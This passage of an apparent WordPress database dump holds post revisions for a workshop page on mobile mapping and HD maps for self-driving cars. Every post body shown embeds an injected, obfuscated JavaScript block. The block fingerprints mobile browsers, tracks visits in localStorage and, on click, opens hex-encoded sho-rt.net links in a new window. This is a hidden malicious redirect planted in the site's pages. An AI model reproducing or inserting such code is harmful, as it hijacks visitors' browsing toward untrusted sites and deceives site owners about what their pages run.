)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-autosave-v1','','','2022-10-07 19:58:53','2022-10-07 19:58:53','',2095,'https://gsw2023.com/?p=2552',0,'revision','',0),
(2553,1,'2022-10-07 19:22:52','2022-10-07 19:22:52','','m2ws3','','inherit','open','closed','','m2ws3','','','2022-10-07 19:22:52','2022-10-07 19:22:52','',2095,'https://gsw2023.com/wp-content/uploads/2020/04/m2ws3.jpg',0,'attachment','image/jpeg',0),
(2554,1,'2022-10-07 19:29:08','2022-10-07 19:29:08','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5>Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\nThis workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:29:08','2022-10-07 19:29:08','',2095,'https://gsw2023.com/?p=2554',0,'revision','',0),
(2555,1,'2022-10-07 19:30:39','2022-10-07 19:30:39','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: center;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\nThis workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 